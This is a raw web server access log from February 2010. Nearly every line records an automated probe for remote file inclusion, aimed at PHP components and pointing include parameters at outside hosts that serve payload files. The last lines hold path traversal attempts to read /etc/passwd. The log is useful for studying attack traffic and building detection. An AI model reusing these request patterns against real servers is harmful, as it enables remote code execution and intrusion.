58.150.99.144 - - [15/Feb/2010:04:18:56 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:18:56 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:18:59 -0800] "GET /logs/access_100114.log%20%20/?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:18:59 -0800] "GET /logs/access_100116.log%20%20/?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:18:59 -0800] "GET /logs/?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:19:05 -0800] "GET /logs/access_100116.log%20%20/?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:19:05 -0800] "GET /logs/access_100114.log%20%20/?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:19:05 -0800] "GET /logs/access_100124.log//abbc.class.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:04:19:06 -0800] "GET /?INCLUDE_FOLDER=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:34 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:34 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:34 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:44 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:45 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:19:45 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:19:45 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:19:46 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:19:48 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:19:51 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:20:14 -0800] "GET /logs/access_100116.log//extadminmenus.class.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:20:15 -0800] "GET /logs/access.log%20//errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:20:15 -0800] "GET /errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:20:15 -0800] "GET /logs//errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:20:52 -0800] "GET /logs/access_100120.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:20:54 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:20:54 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:20:54 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:21:08 -0800] "GET /logs/access_100208.log///skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:21:09 -0800] "GET /logs/access_100119.log///skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:21:53 -0800] "GET /logs/access_100116.log%20//errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:22:32 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:22:41 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:23:07 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:23:15 -0800] "GET /logs/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:23:15 -0800] "GET /mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:23:16 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:23:42 -0800] "GET /logs/access_100130.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:23:51 -0800] "GET /logs/access_100130.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:24:04 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:24:33 -0800] "GET /logs/access_100112.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:24:54 -0800] "GET /logs/access_100202.log%20//errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:24:54 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:25:06 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:25:11 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:25:15 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:25:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:25:15 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:25:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:25:32 -0800] "GET /logs/access_100112.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:25:42 -0800] "GET /logs/access_100130.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:26:02 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:26:02 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:26:02 -0800] "GET /logs/access_100203.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:28:13 -0800] "GET /mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:28:13 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:28:13 -0800] "GET /logs/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:34 -0800] "GET /omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:34 -0800] "GET /logs/access_100103.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:34 -0800] "GET /logs/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [15/Feb/2010:04:28:35 -0800] "GET /logs/access_100208.log%20//errors.php?error=http://www.aslcaserta2.it//id8.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:36 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:36 -0800] "GET /logs/access_100210.log//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:36 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:36 -0800] "GET /logs/access_100202.log//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:28:37 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:28:37 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:28:37 -0800] "GET /logs/access_100103.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:38 -0800] "GET /logs/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:38 -0800] "GET /logs/access_100103.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:38 -0800] "GET /omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:38 -0800] "GET /omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:38 -0800] "GET /logs/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:28:38 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:28:38 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:28:38 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:39 -0800] "GET /logs/access_100103.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:54 -0800] "GET /logs/access_100210.log//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:55 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:28:55 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:28:58 -0800] "GET /logs/access_100104.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:29:00 -0800] "GET /logs/access_100202.log//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:29:00 -0800] "GET /logs/access_100104.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:29:01 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:29:01 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:29:01 -0800] "GET /logs/access_100123.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [15/Feb/2010:04:29:06 -0800] "GET /logs/access_100104.log%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:29:30 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:29:39 -0800] "GET /logs/access_100125.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:30:04 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:30:04 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:30:04 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:31:00 -0800] "GET /logs/access_100119.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:31:19 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:31:19 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:31:19 -0800] "GET /logs/access_100128.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:31:26 -0800] "GET /logs/access_100130.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [15/Feb/2010:04:31:53 -0800] "GET /logs/access_100114.log/errors.php?error=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [15/Feb/2010:04:31:53 -0800] "GET /errors.php?error=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [15/Feb/2010:04:31:53 -0800] "GET /logs/errors.php?error=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:33:02 -0800] "GET /logs/access_100119.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:33:13 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:33:13 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:33:13 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:33:15 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:33:30 -0800] "GET /logs/access_100107.log/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:33:34 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:33:34 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:33:34 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [15/Feb/2010:04:33:55 -0800] "GET /logs/access_100210.log/errors.php?error=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:04:33:55 -0800] "GET /logs/access_100109.log/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:04:33:55 -0800] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:33:56 -0800] "GET /logs/access_100119.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:33:56 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:33:56 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:33:56 -0800] "GET /logs/access_100111.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:04:33:56 -0800] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
